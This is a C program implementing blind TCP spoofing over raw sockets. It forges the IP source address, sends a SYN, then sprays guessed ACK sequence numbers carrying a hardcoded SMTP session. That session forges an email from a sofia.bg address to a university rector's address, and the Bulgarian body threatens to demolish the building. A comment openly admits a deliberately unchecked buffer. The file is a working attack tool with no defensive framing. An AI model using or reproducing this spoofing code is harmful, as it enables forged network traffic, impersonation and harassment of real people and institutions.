#define _BSD_SOURCE
#include <stdio.h>
#include <netinet/ip.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <asm/types.h>
#include <string.h>
#include <unistd.h>

#define FIN 1
#define SYN 2
#define ACK 16
#define tcp_seq int

/*---------------Checksum calculation--------------------------------*/
unsigned short in_cksum(unsigned short *addr,int len)
{
	register int nleft = len;
	register unsigned short *w = addr;
	register int sum = 0;
	unsigned short answer = 0;

	while (nleft > 1)
	{
		sum += *w++;
		nleft -= 2;
	}
	if (nleft == 1)
	{
		*(u_char *)(&answer) = *(u_char *)w ;
		sum += answer;
	}
	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	answer = ~sum;
	return(answer);
}
/*----------------------------------------------------------------------*/

/*------------Send spoofed TCP packet-----------------------------------*/
int send_tcp(int sfd,unsigned int src,unsigned short src_p,
	     unsigned int dst,unsigned short dst_p,tcp_seq seq,tcp_seq ack,
	     u_char flags,char *buffer,int len)
{
	struct iphdr ip_head;
	struct tcphdr tcp_head;
	struct sockaddr_in target;
	char packet[2048];     /*the exploitation of this is left as an exercise..*/
	int i;

	struct tcp_pseudo        /*the tcp pseudo header*/
	{
		__u32 src_addr;
		__u32 dst_addr;
		__u8  dummy;
		__u8  proto;
		__u16 length;
	} pseudohead;

	struct help_checksum   /*struct for checksum calculation*/
	{
		struct tcp_pseudo pshd;
		struct tcphdr tcphd;
		char tcpdata[1024];
	} tcp_chk_construct;


	/*Prepare IP header*/
	ip_head.ihl      = 5;     /*headerlength with no options*/
	ip_head.version  = 4;
	ip_head.tos      = 0;
	ip_head.tot_len  = htons(sizeof(struct iphdr)+sizeof(struct tcphdr)+len);
	ip_head.id       = htons(31337 + (rand()%100));
	ip_head.frag_off = 0;
	ip_head.ttl      = 255;
	ip_head.protocol = IPPROTO_TCP;
	ip_head.check    = 0;    /*Fill in later*/
	ip_head.saddr    = src;
	ip_head.daddr    = dst;
	ip_head.check    = in_cksum((unsigned short *)&ip_head,sizeof(struct iphdr));

	/*Prepare TCP header*/
	tcp_head.th_sport = htons(src_p);
	tcp_head.th_dport = htons(dst_p);
	tcp_head.th_seq   = htonl(seq);
	tcp_head.th_ack   = htonl(ack);
	tcp_head.th_x2    = 0;
	tcp_head.th_off   = 5;
	tcp_head.th_flags = flags;
	tcp_head.th_win   = htons(0x7c00);
	tcp_head.th_sum   = 0;  /*Fill in later*/
	tcp_head.th_urp   = 0;

	/*Assemble structure for checksum calculation and calculate checksum*/
	pseudohead.src_addr=ip_head.saddr;
	pseudohead.dst_addr=ip_head.daddr;
	pseudohead.dummy=0;
	pseudohead.proto=ip_head.protocol;
	pseudohead.length=htons(sizeof(struct tcphdr)+len);

	tcp_chk_construct.pshd=pseudohead;
	tcp_chk_construct.tcphd=tcp_head;
	memcpy(tcp_chk_construct.tcpdata,buffer,len);

	tcp_head.th_sum=in_cksum((unsigned short *)&tcp_chk_construct,
				 sizeof(struct tcp_pseudo)+sizeof(struct tcphdr)+len);

	/*Assemble packet*/
	memcpy(packet,(char *)&ip_head,sizeof(ip_head));
	memcpy(packet+sizeof(ip_head),(char *)&tcp_head,sizeof(tcp_head));
	memcpy(packet+sizeof(ip_head)+sizeof(tcp_head),buffer,len);

	/*Send packet*/
	target.sin_family     = AF_INET;
	target.sin_addr.s_addr= ip_head.daddr;
	target.sin_port       = tcp_head.th_dport;
	i=sendto(sfd,packet,sizeof(struct iphdr)+sizeof(struct tcphdr)+len,0,
		 (struct sockaddr *)&target,sizeof(struct sockaddr_in));
	if(i<0)
		return(-1); /*Error*/
	else
		return(i); /*Return number of bytes sent*/
}
/*---------------------------------------------------------------------*/

int main(int argc, char *argv[])
{
	int i,j,num;
	unsigned int source,target;
	unsigned short int s_port,d_port;
	tcp_seq sequence;

	char data[]="HELO sofia.bg\r\nMAIL FROM:<kmet@sofia.bg>\r\nRCPT TO:<rektor@uni-sofia.bg>\r\nDATA\r\nFrom: <kmet@sofia.bg>\r\nTo: <rektor@uni-sofia.bg>\r\nSubject: Shte subarame sgradata\r\n\r\nShte subarqme sgradata vi i shte stroim banq. Iznasqjte se.\r\n.\r\nQUIT\r\n";
	int dlen;

	dlen=strlen(data);
	printf("Data length: %d\n",dlen);	
	source=inet_addr(argv[1]);
	s_port=atoi(argv[2]);
	target=inet_addr(argv[3]);
	d_port=atoi(argv[4]);
        sequence=atol(argv[5]);
	num=atoi(argv[6]);
	
	if((i=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0)  /*open sending socket*/
	{
		perror("socket");
		exit(1);
	}
	send_tcp(i,source,s_port,target,d_port,sequence,0,SYN,NULL,0);
	printf("SYN sent\n");
	usleep(1000);
	for (j=0;j<num;j++) send_tcp(i,source,s_port,target,d_port,sequence+1,sequence+j,ACK,data,dlen); 
	printf("data sent\n");
	usleep(1000);
	for (j=0;j<num;j++) send_tcp(i,source,s_port,target,d_port,sequence+1+strlen(data),sequence+j+dlen,FIN,NULL,0);
	printf("FIN sent\n");
	close(i);
	return 0;
}
